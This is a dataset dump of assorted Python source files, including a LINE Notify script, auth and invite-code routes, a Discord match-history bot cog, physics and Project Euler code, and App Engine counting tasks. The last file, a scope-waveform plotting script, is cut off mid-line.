id (string, 2–8 chars) | text (string, 16–264k chars) | dataset_id (string, 1 class)
---|---|---
6499174
|
<reponame>WachiRatip/ex<filename>linenotify.py
import requests,json
import urllib.parse
LINE_ACCESS_TOKEN="<KEY>"
url = "https://notify-api.line.me/api/notify"
message ="VM has done their jobs" # ข้อความที
msg = urllib.parse.urlencode({"message":message})
LINE_HEADERS = {'Content-Type':'application/x-www-form-urlencoded',"Authorization":"Bearer "+LINE_ACCESS_TOKEN}
session = requests.Session()
a=session.post(url, headers=LINE_HEADERS, data=msg)
print(a.text)
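# Descriptive note (not part of the original script): on success the LINE Notify
# endpoint typically answers HTTP 200 with a small JSON body such as
# {"status":200,"message":"ok"}, which is what the print above displays.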
|
StarcoderdataPython
|
131884
|
<reponame>tcmal/ah-project
# Routes related to Users
# Specifically:
# Registering
# Authenticating
# Generating Invite Codes
# Getting a list of users
import base64
import datetime
import json
import random
from math import floor
from rsa import RSAKeypair
from rsa.classes import PUB_KEY_START, PUB_KEY_END
from routes.common import send_bad_request, send_server_error, is_authorised, send_json
from utils import random_string, has_keys
# POST /register
# Inputs: invite_code, name, bio, public_key
# Attempts to register a new user
# Outputs: Details of new user OR 'Not valid'
def register(req, res):
# Get inputs from request
## Check they all exist first
if not req.body or not has_keys(req.body, ("invite_code", "name", "bio", "public_key")):
## Error otherwise
return send_bad_request(res, "Malformed Request")
invite_code = req.body['invite_code']
name = req.body['name']
bio = req.body['bio']
public_key = req.body['public_key']
# Verify name, bio and public key
valid = len(name) <= 50 and len(name) > 0 and len(bio) <= 250 # bio can be empty
## Check if the public key is valid
try:
deserialised = RSAKeypair.deserialise(public_key)
assert deserialised.is_public
except Exception as _:
valid = False
## Error otherwise
if not valid:
return send_bad_request(res, "Invalid name, bio or public key")
# Verify invite code is valid and exists
code_valid = False
if len(invite_code) == 10 and invite_code.isalnum(): # Is alpha numeric and 10 chars long
## Check database
with req.db as conn:
# Check one that's not used by a user exists
sql = "SELECT COUNT(*) AS valid FROM InviteCode WHERE code = %s AND code NOT IN (SELECT invite_code FROM User);"
conn.execute(sql, (invite_code,))
result = conn.fetchone()
code_valid = result[0] > 0
# Error otherwise
if not code_valid:
return send_bad_request(res, "Invalid Invite Code")
# Add the user to the database
with req.db as conn:
## Convert public key to what ends up in the database
processed_pk = deserialised.to_binary_hex()
sql = "INSERT INTO User (name, bio, public_key, is_admin, invite_code) VALUES (%s, %s, X%s, 0, %s)"
success = True
try:
conn.execute(sql, (name, bio, processed_pk, invite_code))
success = conn.rowcount == 1
except Exception as _: # Probably duplicate name
success = False
if success:
# Return details of new user
return send_json(res, {
'success': True,
'name': name,
'bio': bio,
'public_key': public_key,
})
else:
# OR Error
return send_bad_request(res, "Username already taken")
# POST /auth/getChallenge
# Inputs: username
# Get the authentication challenge for that user
def getChallenge(req, res):
# Get user to try and sign in as
if not req.body or not "username" in req.body.keys():
## Error otherwise
return send_bad_request(res, "Malformed Request")
username = req.body['username']
# Generate random string
challenge_string = random_string(10)
# Save to database along with time generated (if user exists)
with req.db as conn:
sql = "UPDATE User SET last_challenge_issued = %s, challenge_issued_at = NOW() WHERE name = %s"
conn.execute(sql, (challenge_string, username))
updated = conn.rowcount == 1
if updated:
# Return challenge
return send_json(res, {
'success': True,
'challenge_string': challenge_string,
})
else:
# Error if user doesn't exist
return send_bad_request(res, "User Not Found")
# POST /auth/submitChallenge
# Inputs: username, challenge_answer
# Try to authenticate as user
def submitChallenge(req, res):
# Get inputs from request
## Check they all exist first
if not req.body or not has_keys(req.body, ("username", "challenge_answer")):
## Error otherwise
return send_bad_request(res, "Malformed Request")
username = req.body['username']
challenge_answer = req.body['challenge_answer']
# Get user from database (OR error)
with req.db as conn:
sql = "SELECT HEX(public_key), last_challenge_issued, challenge_issued_at FROM User WHERE name = %s"
conn.execute(sql, (username,))
result = conn.fetchone()
if not result:
return send_bad_request(res, "User Not Found or Invalid challenge")
pk_hexstring = result[0]
last_challenge_issued = result[1]
challenge_issued_at = result[2]
# Verify challenge issued within 10 minutes (OR error)
mins_since = (datetime.datetime.now() - challenge_issued_at).seconds / 60
if mins_since > 10:
return send_bad_request(res, "Challenge timed out")
# Decrypt signed challenge with public key
key = RSAKeypair.from_binary_hex(pk_hexstring)
# Verify equal to last challenge issued (OR error)
message = bytearray(key.decrypt_signed(challenge_answer)).decode('ascii')
if message == False or message != last_challenge_issued:
return send_bad_request(res, "User Not Found or Invalid challenge")
# Generate random session token
cookie_val = res.server.session_store.new()
# Store it as session token for this user
session = res.server.session_store.get(cookie_val)
session.username = username
# Return session token
req.cookies['session'] = cookie_val
req.cookies['session']['max-age'] = 2 * 60 * 60
req.cookies['session']['path'] = '/'
res.send_response(200)
res.send_header('Content-Type', 'application/json')
res.send_header('Set-Cookie', str(req.cookies).replace('Set-Cookie: ', ''))
res.end_headers()
res.wfile.write(json.dumps({
'success': True,
'session_cookie': cookie_val,
'username': username
}).encode('ascii'))
# GET /admin/genInviteCode
# Generate a new invitecode, as long as you're an admin
def genInviteCode(req, res):
# Verify authorisation
if not is_authorised(req):
# Error otherwise
return send_bad_request(res, 'No Session')
# Verify user is admin
with req.db as conn:
sql = "SELECT COUNT(*) FROM user WHERE name = %s AND is_admin = 1"
conn.execute(sql, (req.session.username,))
count = conn.fetchone()[0]
is_admin = count == 1
if not is_admin:
# Error otherwise
return send_bad_request(res, "Not an admin")
# Generate random string
invite_code = random_string(10)
# Save to database as invite code
with req.db as conn:
sql = "INSERT INTO invitecode (code, created_by) VALUES (%s, %s)"
conn.execute(sql, (invite_code, req.session.username))
success = conn.rowcount == 1
if success:
# Return invite code
return send_json(res, {
'success': True,
'invite_code': invite_code
})
else:
# This shouldn't happen
send_server_error(res)
# GET /directory
# Return all users on the server (as long as you're authenticated)
def directory(req, res):
# Verify the user's authorisation (OR error)
if not is_authorised(req):
return send_bad_request(res, "No Session")
# Get the users from the database
users = []
with req.db as conn:
sql = "SELECT name, bio, is_admin, HEX(public_key) FROM User WHERE name != 'console'"
conn.execute(sql)
for row in conn:
users.append({
'name': row[0],
'bio': row[1],
'is_admin': row[2] == 1,
'public_key': RSAKeypair.binary_hex_to_serialised(row[3])
})
# Return them
return send_json(res, {
'success': True,
'users': users
})
|
StarcoderdataPython
|
4898242
|
import discord
from discord.ext import commands
from pyrez.exceptions import PlayerNotFound, PrivatePlayer, NotFound, MatchException
# Class handles commands related to a player's previous matches
class MatchHistoryCommands(commands.Cog, name="Match History Commands"):
"""Match History Commands"""
def __init__(self, bot):
self.bot = bot
@classmethod
# Used to change a line's text prefix, which changes its color
async def color_win_rates(cls, text, win_rate):
if float(win_rate) > 60.0:
return "+" + text
elif float(win_rate) < 50.0 and float(win_rate) != 0.0:
return "-" + text
else:
return "*" + text
@classmethod
# Converts the match name so that it's small enough to fit on one line
async def convert_match_type(cls, match_name):
if "Practice" in match_name:
return "Bot Match"
elif "TDM" in match_name:
return "TDM"
elif "Onslaught" in match_name:
return "Onslaught"
elif "Ranked" in match_name:
return "Ranked"
elif "(KOTH)" in match_name:
return "KOTH"
elif "(Siege)" in match_name: # Test Maps (WIP)
return "Test Maps"
else:
return "Siege"
@commands.command(name='history', pass_context=True, ignore_extra=False,
aliases=["History", "historia", "Historia"])
@commands.cooldown(3, 40, commands.BucketType.user)
async def history(self, ctx, player_name, amount=None, champ_name=None):
lang = await self.bot.language.check_language(ctx=ctx)
# Maybe convert the player name
if str(player_name) == "me":
player_name = await self.check_player_name(str(ctx.author.id))
elif player_name[0] == "<" and player_name[1] == "@": # 99% chance that someone has been mentioned
player_name = player_name.replace("<", "").replace(">", "").replace("@", "").replace("!", "")
if len(player_name) == 18:
player_name = await self.check_player_name(player_name)
if player_name == "None":
await ctx.send("You have not stored your IGN yet. To do so please use the store command like so: "
"`>>store Paladins_IGN`")
return None
await helper.store_commands(ctx.author.id, "history")
async with ctx.channel.typing():
if amount:
try:
amount = int(amount)
except ValueError:
champ_name = amount
amount = 50
else:
amount = 10
if amount > 50 or amount < 10:
await ctx.send("Please enter an amount between 10-50.")
await ctx.send("```fix\nDefaulting to the default value of 10 matches.```")
amount = 10
player_id = self.get_player_id(player_name)
if player_id == -1:
await ctx.send(self.lang_dict["general_error2"][lang].format(player_name))
return None
elif player_id == -2:
await ctx.send("```Invalid platform name. Valid platform names are:\n1. Xbox\n2. PS4\n3. Switch```")
return None
elif player_id == -3:
await ctx.send("Name overlap detected. Please look up your Paladins ID using the `>>console` command.")
return None
if champ_name: # Check in case they don't provide champ name
champ_name = await self.convert_champion_name(str(champ_name))
try:
paladins_data = self.bot.paladinsAPI.getMatchHistory(player_id)
# Endpoint down
if paladins_data is None:
await ctx.send("```fix\nPaladins Endpoint down (no data returned). Please try again later and "
"hopefully by then Evil Mojo will have it working again.```")
return None
except (NotFound, MatchException):
await ctx.send("Player does not have recent match data or their account is private. Make sure the first"
" parameter is a player name and not the Match Id.")
return None
count = 0
total_matches = 0
match_data = ""
match_data2 = ""
# Damage, Flank, Tank, Support => (win, lose)
total_wins = [0, 0, 0, 0, 0, 0, 0, 0]
# Damage, Flank, Tank, Support => (kda, total_matches per class)
total_kda = [0, 0, 0, 0, 0, 0, 0, 0]
global_kda = 0.0
for match in paladins_data:
# Check to see if this player does have match history
if match.playerName is None:
await ctx.send("Player does not have recent match data or their account is private.")
return None
else:
player_name = match.playerName
# empty string means to get everything or only get matches with a certain champ
if not champ_name or champ_name == match.godName:
ss = str('+{:10}{:4}{:3}:00 {:9} {:9} {:5} ({}/{}/{})\n')
kills = match.kills
deaths = match.deaths
assists = match.assists
kda = await self.calc_kda(kills, deaths, assists)
match_name = await self.convert_match_type(match.mapName)
ss = ss.format(match.godName, match.winStatus, match.matchMinutes, match_name,
match.matchId, kda, kills, deaths, assists)
# we don't want to count event or bot matches when calculating stats
if match_name != "Bot Match" and match_name != "End Times" and match_name != "Test Maps":
global_kda += float(kda)
total_matches += 1
class_index = self.bot.champs.get_champ_class(match.godName)
if class_index != -1:
total_kda[class_index * 2] += float(kda)
total_kda[class_index * 2 + 1] += 1
if match.winStatus == "Loss":
total_wins[class_index * 2 + 1] += 1 # Losses
else:
total_wins[class_index * 2] += 1 # Wins
else:
print("Unclassified champion: " + str(match.godName))
# Used for coloring
if match.winStatus == "Loss":
ss = ss.replace("+", "-")
if count >= 30:
match_data2 += ss
else:
match_data += ss
# Making sure we display the correct number of matches
count += 1
if count == amount:
break
if not match_data and champ_name:
await ctx.send("Could not find any matches with the champion: `" + champ_name + "` in the last `"
+ str(amount) + "` matches.")
return None
# Base string to hold kda and win rate for all classes
ss = "Class KDA: Win Rate:\n\n" \
"Total: {:5} {:6}% ({}-{})\n" \
"Damages: {:5} {:6}% ({}-{})\n" \
"Flanks: {:5} {:6}% ({}-{})\n" \
"Tanks: {:5} {:6}% ({}-{})\n" \
"Healers: {:5} {:6}% ({}-{})\n\n"
# Calculating win rates
d_t = total_wins[0] + total_wins[1] # Damage total matches
f_t = total_wins[2] + total_wins[3] # Flank total matches
t_t = total_wins[4] + total_wins[5] # Tank total matches
s_t = total_wins[6] + total_wins[7] # Healer total matches
d_wr = await self.calc_win_rate(total_wins[0], d_t)
f_wr = await self.calc_win_rate(total_wins[2], f_t)
t_wr = await self.calc_win_rate(total_wins[4], t_t)
s_wr = await self.calc_win_rate(total_wins[6], s_t)
# Total wins/loses
if total_matches == 0: # prevent division by 0
total_matches = 1
global_kda = round(global_kda / total_matches, 2)
tot_wins = total_wins[0] + total_wins[2] + total_wins[4] + total_wins[6]
tot_loses = total_wins[1] + total_wins[3] + total_wins[5] + total_wins[7]
total_wr = await self.calc_win_rate(tot_wins, d_t + f_t + t_t + s_t)
# Coloring based off of class/total win rates
ss = ss.replace("Total", await self.color_win_rates("Total", total_wr)) \
.replace("Damages", await self.color_win_rates("Damages", d_wr)) \
.replace("Flanks", await self.color_win_rates("Flanks", f_wr)) \
.replace("Tanks", await self.color_win_rates("Tanks", t_wr)) \
.replace("Healers", await self.color_win_rates("Healers", s_wr))
# KDA calc
d_kda, f_kda, t_kda, s_kda, = 0.0, 0.0, 0.0, 0.0
if total_kda[0] != 0:
d_kda = round(total_kda[0] / total_kda[1], 2)
if total_kda[2] != 0:
f_kda = round(total_kda[2] / total_kda[3], 2)
if total_kda[4] != 0:
t_kda = round(total_kda[4] / total_kda[5], 2)
if total_kda[6] != 0:
s_kda = round(total_kda[6] / total_kda[7], 2)
# Filling the string with all the data
ss = ss.format(global_kda, total_wr, tot_wins, tot_loses, d_kda, d_wr, total_wins[0], total_wins[1], f_kda,
f_wr, total_wins[2], total_wins[3], t_kda, t_wr, total_wins[4], total_wins[5], s_kda, s_wr,
total_wins[6], total_wins[7])
title = str('{}\'s last {} matches:\n\n').format(str(player_name), count)
title += str('{:11}{:4} {:4} {:9} {:9} {:5} {}\n').format("Champion", "Win?", "Time", "Mode", "Match ID",
"KDA", "Detailed")
title += match_data
await ctx.send("```diff\n" + title + "```")
match_data2 += "\n\n" + ss
await ctx.send("```diff\n" + match_data2 + "```")
# Returns simple match history details
@commands.command(name='last', pass_context=True, ignore_extra=False, aliases=["Last", "ostatni", "Ostatni"])
@commands.cooldown(2, 30, commands.BucketType.user)
async def last(self, ctx, player_name, match_id=-1):
lang = await self.bot.language.check_language(ctx=ctx)
# Maybe convert the player name
if str(player_name) == "me":
player_name = await self.check_player_name(str(ctx.author.id))
elif player_name[0] == "<" and player_name[1] == "@": # 99% chance that someone has been mentioned
player_name = player_name.replace("<", "").replace(">", "").replace("@", "").replace("!", "")
if len(player_name) == 18:
player_name = await self.check_player_name(player_name)
if player_name == "None":
await ctx.send("You have not stored your IGN yet. To do so please use the store command like so: "
"`>>store Paladins_IGN`")
return None
await helper.store_commands(ctx.author.id, "last")
player_id = self.get_player_id(player_name)
if player_id == -1:
match_data = self.lang_dict["general_error2"][lang].format(player_name)
embed = discord.Embed(
title=match_data,
colour=discord.colour.Color.dark_teal()
)
await ctx.send(embed=embed)
return None
elif player_id == -2:
embed = discord.Embed(
title="```Invalid platform name. Valid platform names are:\n1. Xbox\n2. PS4\n3. Switch```",
colour=discord.colour.Color.red()
)
await ctx.send(embed=embed)
return None
elif player_id == -3:
embed = discord.Embed(
title="Name overlap detected. Please look up your Paladins ID using the `>>console` command.",
colour=discord.colour.Color.red()
)
await ctx.send(embed=embed)
return None
try:
paladins_data = self.bot.paladinsAPI.getMatchHistory(player_id)
# Endpoint down
if paladins_data is None:
await ctx.send("```fix\nPaladins Endpoint down (no data returned). Please try again later and "
"hopefully by then Evil Mojo will have it working again.```")
return None
except (NotFound, MatchException):
await ctx.send("Player does not have recent match data or their account is private. Make sure the first"
" parameter is a player name and not the Match Id.")
return None
for match in paladins_data:
# Check to see if this player does have match history
if match.playerName is None:
break
if match_id == -1 or match_id == match.matchId:
match_data = str('{}\'s {} match:\n\n').format(str(match.playerName),
str(match.mapName).replace("LIVE", ""))
ss = str('`Match Status: {} ({} mins)\nChampion: {}\nKDA: {} ({}-{}-{})\nDamage: {:,}\nDamage Taken: '
'{:,}\nHealing: {:,}\nSelf Healing: {:,}\nObjective Time: {}\nShielding: {:,}`\n')
kills = match.kills
deaths = match.deaths
assists = match.assists
kda = await self.calc_kda(kills, deaths, assists)
match_data += ss.format(match.winStatus, match.matchMinutes, match.godName, kda, kills, deaths, assists,
match.damage, match.damageTaken, match.healing, match.healingPlayerSelf,
match.objectiveAssists, match.damageMitigated)
embed = discord.Embed(
description=match_data,
colour=discord.colour.Color.dark_teal(),
)
embed.set_thumbnail(url=await helper.get_champ_image(match.godName))
map_name = match.mapName.replace("LIVE ", "").replace("Ranked ", "").replace(" (TDM)", "") \
.replace(" (Onslaught) ", "").replace(" (Siege)", "").replace("Practice ", "").lower() \
.replace(" ", "_").replace("'", "")
map_url = "https://raw.githubusercontent.com/EthanHicks1/PaladinsAssistantBot/master/icons/maps/{}.png" \
.format(map_name)
embed.set_image(url=map_url)
await ctx.send(embed=embed)
return None
# If the match id could not be found
embed = discord.Embed(
description="Could not find a match with the match id: " + str(match_id),
colour=discord.colour.Color.dark_teal()
)
# If player has not played recently
if match_id == -1:
embed.description = "Player does not have recent match data or their account is private."
await ctx.send(embed=embed)
# Add this class to the cog list
def setup(bot):
bot.add_cog(MatchHistoryCommands(bot))
|
StarcoderdataPython
|
3481809
|
<reponame>divyamamgai/integrations-extras
# (C) Datadog, Inc. 2018
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
from .__about__ import __version__
from .traefik import TraefikCheck
__all__ = ['__version__', 'TraefikCheck']
|
StarcoderdataPython
|
5074467
|
from __future__ import annotations
import asyncio
import socket
from typing import Any, Mapping, Optional
import aiohttp
import async_timeout
from aioherepy.aiohere_api import AioHEREApi
class RoutingApi(AioHEREApi):
"""An asynchronous Python client into the HERE Routing API."""
def __init__(
self,
api_key: str,
request_timeout: int = 10,
session: aiohttp.ClientSession | None = None) -> None:
"""Returns a RoutingApi instance.
Args:
api_key (str):
API key taken from HERE Developer Portal.
request_timeout (int):
Timeout limit for requests.
session (Optional[aiohttp.ClientSession]):
aiohttp client session.
"""
super(RoutingApi, self).__init__(
api_key=api_key,
api_url="https://router.hereapi.com/v8/routes",
request_timeout=request_timeout,
session=session
)
|
StarcoderdataPython
|
9901
|
# ======================================================================
# copyright 2020. Triad National Security, LLC. All rights
# reserved. This program was produced under U.S. Government contract
# 89233218CNA000001 for Los Alamos National Laboratory (LANL), which
# is operated by Triad National Security, LLC for the U.S. Department
# of Energy/National Nuclear Security Administration. All rights in
# the program are reserved by Triad National Security, LLC, and the
# U.S. Department of Energy/National Nuclear Security
# Administration. The Government is granted for itself and others
# acting on its behalf a nonexclusive, paid-up, irrevocable worldwide
# license in this material to reproduce, prepare derivative works,
# distribute copies to the public, perform publicly and display
# publicly, and to permit others to do so.
# ======================================================================
# Authors: <NAME> (<EMAIL>)
# Purpose:
# Provides a check of whether a coordinate transformation of the metric
# from code coordinates to Kerr-Schild coordinates produces correct
# metric, consistent with the closed form (as in e.g. Eq.(3)
# McKinney & Gammie 2004, https://arxiv.org/abs/astro-ph/0404512)
#
# Functions:
# - print_matrix
# - check_transformation_matrices
#
from math import *
import numpy as np
def print_matrix(matrix,fmt="%19.11e",tostdout=True) -> str:
"""Pretty-prints a matrix to a string (optinally, to stdout)
Parameters
----------
matrix : numpy.array([N,M])
matrix to print
fmt : str
C-style format of each element (default: "%19.11e")
tostdout : bool
output to stdout (default: true)
Returns
-------
str
formatted output string
"""
N = matrix.shape[0]
M = matrix.shape[1]
s = "["
for i in range(N):
s+= "["
for j in range(M):
s+= (fmt % matrix[i,j])
if j < M - 1: s += ", "
s+= "]"
if i < N - 1: s += ",\n "
s+="]"
if tostdout: print(s)
return s
def check_transformation_matrices(geom, a, ir, jth,
verbose=True, tol=1e-12) -> bool:
"""Transforms the metric to spherical KS and compares with analytic formula
Test 1: covariant metric, gcov, at A = {ir, jth}
1.1 sample gcov and Lambda_h2bl_cov at A
1.2 transform gcov to gks using transformation matrices
1.3 compare to expected values at {r,th} at A
Parameters
----------
geom : dictionary
nubhlight geom object
a : Float
dimensionless Kerr spin parameter
ir : Integer
index of sample point in radial direction
jth : Integer
index of sample point in angular theta-direction
verbose : bool
output steps to stdout
tol : Float
tolerance to relative error (wrt det g)
Returns
-------
bool
True if all checks passed
Examples
--------
import hdf5_to_dict as io
hdr = io.load_hdr("dump_00000010.h5")
geom = io.load_geom(hdr,recalc=True)
check_transformation_matrices(geom, -1, 64)
"""
# sample gcov and h2bl at point A
gcov_A = geom['gcov'][ir,jth]
h2bl_A = geom['Lambda_h2bl_cov'][ir,jth]
# sample r and theta, compute BL metric-related quantities
r = geom['r'][ir,jth,0]; r2 = r*r
a2 = a*a
th= geom['th'][ir,jth,0]
sth2= sin(th)**2
Delta= r2 - 2*r + a2
Sigma= r2 + a2*cos(th)**2
A = (r2 + a2)**2 - a2*Delta*sin(th)**2
if verbose:
print ("r = %19.11e" % r)
print ("theta = %19.11e" % th)
print ("a = %19.11e" % a)
print ("Delta = %19.11e" % Delta)
print ("Sigma = %19.11e" % Sigma)
print ("A = %19.11e" % A)
# output metric
print ("gcov_A = ")
print_matrix (gcov_A)
print ("")
# output transformation matrix
print ("h2bl_A = ")
print_matrix (h2bl_A)
print ("")
# compute KS metric at A
gks_A = np.zeros([4,4])
for i in range(4):
for j in range(4):
for k in range(4):
for l in range(4):
gks_A[i,j] = gks_A[i,j] + h2bl_A[k,i]*h2bl_A[l,j]*gcov_A[k,l]
if verbose:
print ("gks_A = ")
print_matrix (gks_A)
print("")
# expected values at {r, th}
g_tt = -1. + 2.*r/Sigma
g_rr = 1. + 2.*r/Sigma
g_ff = sth2*(Sigma + a2*g_rr*sth2)
g_thth = Sigma
g_tr = 2*r/Sigma
g_tf = -2*a*r*sth2/Sigma
g_rf = -a*g_rr*sth2
det_g = -Sigma**2*sth2
if verbose:
print ("Expected:")
print (" g_tt = %19.11e" % g_tt )
print (" g_rr = %19.11e" % g_rr )
print (" g_thth = %19.11e" % g_thth)
print (" g_ff = %19.11e" % g_ff )
print (" g_tr = %19.11e" % g_tr )
print (" g_rf = %19.11e" % g_rf )
print (" g_tf = %19.11e" % g_tf )
print ("")
# check gks_A
gks_expected = np.array(
[[ g_tt, g_tr, 0.0, g_tf],
[ g_tr, g_rr, 0.0, g_rf],
[ 0.0, 0.0, g_thth, 0.0],
[ g_tf, g_rf, 0.0, g_ff]]
)
passed = True
for i in range(4):
for j in range(4):
if abs(gks_A[i,j] - gks_expected[i,j])/abs(det_g) > tol:
passed = False
if verbose:
print (f"WARNING: Significant mismatch in gks_A[{i},{j}]:")
print (" -- expected: %19.11e" % gks_expected[i,j])
print (" -- actual: %19.11e" % gks_A[i,j])
return passed
|
StarcoderdataPython
|
1720966
|
<reponame>saurabhpetkar/club_portal
from django import template
import re
import random
register = template.Library()
@register.filter
def clubslug(value):
return value.replace(' ', '-')
@register.filter
def removeImg(value):
print(value)
p = re.compile(r'<img.*?/>')
p = p.sub('', value)
return p
@register.filter
def randomNumber(limit):
return random.randint(1, limit)
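# Illustrative template usage for these filters (variable names are assumed,
# not taken from the project):
#   {{ club.name|clubslug }}        -> "My-Club" for a club named "My Club"
#   {{ post.body|removeImg|safe }}  -> post body with self-closing <img .../> tags stripped
#   {{ 10|randomNumber }}           -> a random integer between 1 and 10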
|
StarcoderdataPython
|
3393288
|
<gh_stars>0
import array
import sys
from euler_python.utils import eulerlib
def problem211():
LIMIT = 64000000
# Can be any number >= 1, but it's most beneficial to use a product of unique small primes excluding 2
RESIDUE_TEST = 3 * 5 * 7 * 11 * 13
isresidue = [False] * RESIDUE_TEST
for i in range(RESIDUE_TEST):
isresidue[i * i % RESIDUE_TEST] = True
def is_perfect_square(x):
# Optional optimization: Check if x is a quadratic residue modulo some number.
# The modulus was chosen to be a product of k primes; in this case, k = 5.
# If x is a square, then it must be a quadratic residue modulo each prime.
# For each prime p, there is an approximately half chance that an arbitrary number
# is a residue mod p. Thus with 5 primes, only about 1/32 of candidates remain.
# Note that the prime 2 tells us nothing about whether x is a square, so we exclude it.
return isresidue[x % RESIDUE_TEST] and eulerlib.is_square(x)
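# Worked micro-example of the residue filter (illustrative only): squares mod 5
# can only be congruent to 0, 1 or 4, so any x with x % 5 == 3 fails the
# combined residue test and eulerlib.is_square is never called for it. With
# RESIDUE_TEST a product of five odd primes, roughly 31/32 of non-squares are
# rejected this cheaply.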
# Requires at least 640 MB of memory
sigma2 = list_sigma2(LIMIT - 1)
ans = sum(i for i in range(1, LIMIT) if is_perfect_square(sigma2[i]))
return ans
def list_sigma2(n):
# If i has a prime factor p <= sqrt, then quasiprimefactor[i] = p.
# Otherwise i > sqrt must be prime, and quasiprimefactor[i] = 0 because i may overflow an int16.
sqrt = eulerlib.sqrt(n)
quasiprimefactor = array.array("H", (0 for _ in range(n + 1)))
# Richer version of the sieve of Eratosthenes
for i in range(2, sqrt + 1):
if quasiprimefactor[i] == 0:
quasiprimefactor[i] = i
for j in range(i * i, n + 1, i):
if quasiprimefactor[j] == 0:
quasiprimefactor[j] = i
if sys.version_info.major < 3:
sigma2 = [0] * (n + 1)
else:
sigma2 = array.array("Q", (0 for _ in range(n + 1)))
sigma2[1] = 1
for i in range(2, len(sigma2)):
p = quasiprimefactor[i]
if p == 0:
p = i
sum = 1
j = i
p2 = p * p
k = p2
while j % p == 0:
sum += k
j //= p
k *= p2
sigma2[i] = sum * sigma2[j]
return sigma2
if __name__ == "__main__":
print(problem211())
|
StarcoderdataPython
|
6559340
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# __author__ = 'Liantian'
# __email__ = "<EMAIL>"
#
# MIT License
#
# Copyright (c) 2018 liantian
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from main import app
from models import Post, Category, Archive
# from models import Comment
@app.route('/task/category_count', methods=['GET'], endpoint="task.category_count")
def category_count():
queue = []
queue2 = []
categories = Category.query().fetch()
for c in categories:
cq = dict({})
cq["object"] = c
if c.parent is None:
cq["c_future"] = Category.query(Category.parent == c.key).count_async()
cq["p_future"] = Post.query(Post.category == c.key, Post.status == Post.STATUS_PUBLISHED).count_async()
queue.append(cq)
for q in queue:
c = q["object"]
c.post_count = q["p_future"].get_result()
if q.get("c_future", False):
c.child_count = q["c_future"].get_result()
else:
c.child_count = 0
queue2.append(c.put_async())
for q in queue2:
q.get_result()
return "Done"
@app.route('/task/archive_count', methods=['GET'], endpoint="task.archive_count")
def archive_count():
queue = []
queue2 = []
archives = Archive.query().fetch()
for archive in archives:
cq = dict({})
cq["object"] = archive
cq["p_future"] = Post.query(Post.archive == archive.key, Post.status == Post.STATUS_PUBLISHED).count_async()
queue.append(cq)
for q in queue:
c = q["object"]
c.post_count = q["p_future"].get_result()
queue2.append(c.put_async())
for q in queue2:
q.get_result()
return "Done"
|
StarcoderdataPython
|
3274612
|
<gh_stars>0
"""
To read and plot scope waveforms from CSV files
Author: <NAME>
Version 0
"""
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import pandas as pd
from tkinter.filedialog import askopenfilenames
from tkinter.filedialog import askdirectory
from tkinter import *
def file_dialog():
Tk().withdraw()
file = askopenfilenames()
return file
def dir_dialog():
Tk().withdraw()
pwd = askdirectory()
return pwd
def powermW(x):
P = np.float64(10**(x/10))
return P
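# Descriptive note: this converts a power level in dBm to milliwatts,
# P[mW] = 10 ** (dBm / 10); e.g. powermW(0) == 1.0, powermW(10) == 10.0,
# powermW(-30) == 0.001.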
files = file_dialog()
d1 = pd.read_csv(files[0], dtype='a')
#d2 = pd.read_csv(files[1], dtype='a')
'''d3 = pd.read_csv(files[2], dtype='a')
d4 = pd.read_csv(files[3], dtype='a')
d5 = pd.read_csv(files[4], dtype='a')
d6 = pd.read_csv(files[5], dtype='a')'''
d1['X'] = (np.float64(d1['X']))*(np.float64(d1['Increment'][0]))
#d2['X'] = (np.float64(d2['X']))*(np.float64(d2['Increment'][0]))
'''d3['X'] = (np.float64(d3['X']))*(np.float64(d3['Increment'][0]))
d4['X'] = (np.float64(d4['X']))*(np.float64(d4['Increment'][0]))
d5['X'] = (np.float64(d5['X']))*(np.float64(d5['Increment'][0]))
d6['X'] = (np.float64(d6['X']))*(np.float64(d6['Increment'][0]))'''
d1['CH1'] = (np.float64(d1['CH1']))
#d2['CH1'] = (np.float64(d2['CH1']))
'''d3['CH1'] = (np.float64(d3['CH1']))
d4['CH1'] = (np.float64(d4['CH1']))-9.8
d5['CH1'] = (np.float64(d5['CH1']))
d6['CH1'] = (np.float64(d6['CH1']))'''
'''PmW1 = powermW(d1['CH1'])/1E-6
PmW2 = powermW(d2['CH1'])/1E-6
PmW3 = powermW(d3['CH1'])/1E-6
PmW4 = powermW(d4['CH1'])/1E-6
PmW5 = powermW(d5['CH1'])/1E-6
PmW6 = powermW(d6['CH1'])/1E-6'''
'''d1 = pd.DataFrame({
'X': d1['X'],
'CH1': d1['CH1'],
'PmW': PmW1
})
d2 = pd.DataFrame({
'X': d2['X'],
'CH1': d2['CH1'],
'PmW': PmW2
})
d3 = pd.DataFrame({
'X': d3['X'],
'CH1': d3['CH1'],
'PmW': PmW3
})
d4 = pd.DataFrame({
'X': d4['X'],
'CH1': d4['CH1'],
'PmW': PmW4
})
d5 = pd.DataFrame({
'X': d5['X'],
'CH1': d5['CH1'],
'PmW': PmW5
})
d6 = pd.DataFrame({
'X': d6['X'],
'CH1': d6['CH1'],
'PmW': PmW6
})'''
'''diff1 = pd.DataFrame({
'X': d1['X'],
'diff': d1['PmW']-d5['PmW']
})
diff2 = pd.DataFrame({
'X': d2['X'],
'diff': d3['PmW']-d6['PmW']
})
diff3 = pd.DataFrame({
'X': d2['X'],
'diff': d2['PmW']-d5['PmW']
})
diff4 = pd.DataFrame({
'X': d2['X'],
